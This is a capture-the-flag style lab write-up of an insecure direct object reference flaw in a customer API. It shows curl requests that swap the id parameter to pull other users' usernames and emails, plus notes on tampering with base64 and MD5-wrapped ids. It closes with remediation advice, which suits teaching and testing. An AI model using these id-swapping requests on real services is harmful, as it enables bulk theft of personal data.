Case file

Customer API IDOR exposing usernames and emails by id

Foundations web engagement: account UI loaded /api/v1/customer?id= without ownership checks; swapping ids disclosed adam84 and j@fakemail.thm plus encoded/hashed ID patterns.

Foundations20 minWeb · IDOR · API · Access Control
  • Registered customer session; Network tab showed customer?id=; horizontal id swaps returned other users’ PII. Brief covered base64 and MD5-wrapped ids as well.

  • Authenticated session; id=1 and id=3 disclosed other customers.

01

Engagement summary

Registered customer session; Network tab showed customer?id=; horizontal id swaps returned other users’ PII. Brief covered base64 and MD5-wrapped ids as well.

IDOR lab demonstrated insecure direct object references end-to-end. After customer registration, Your Account prefilled fields via GET /api/v1/customer?id={self}. Changing id to 1 returned username adam84; id=3 returned email j@fakemail.thm — no server-side ownership check. Supporting material covered Base64-encoded ids, MD5 of integer ids, and dual-account swap testing when ids look unpredictable.

Business impact

Horizontal IDOR on customer APIs is bulk PII theft. Authorize every object against the session subject; prefer opaque non-sequential ids only as defense-in-depth, never as the sole control.

02

Practical /api/v1/customer IDOR

Authenticated session; id=1 and id=3 disclosed other customers.

OPERATOR · API

# register → login → DevTools Network on /account

savvy@lab:~$ curl -s -b 'session=<cookie>' 'http://target/api/v1/customer?id=50'

{"id":50,"username":"<self>","email":"<self>"}

savvy@lab:~$ curl -s -b 'session=<cookie>' 'http://target/api/v1/customer?id=1'

{"id":1,"username":"adam84",...}

savvy@lab:~$ curl -s -b 'session=<cookie>' 'http://target/api/v1/customer?id=3'

{"id":3,"email":"j@fakemail.thm",...}

NOTE · OBSCURED IDS

idor-patterns.txt

base64(user_id)     → decode, mutate, re-encode
md5("123")           → crackstation / offline map
unpredictable UUID   → still test with two accounts

Remediation

Server-side ACL on every customer id. Add automated IDOR tests that swap ids across two sessions. Log cross-tenant access attempts.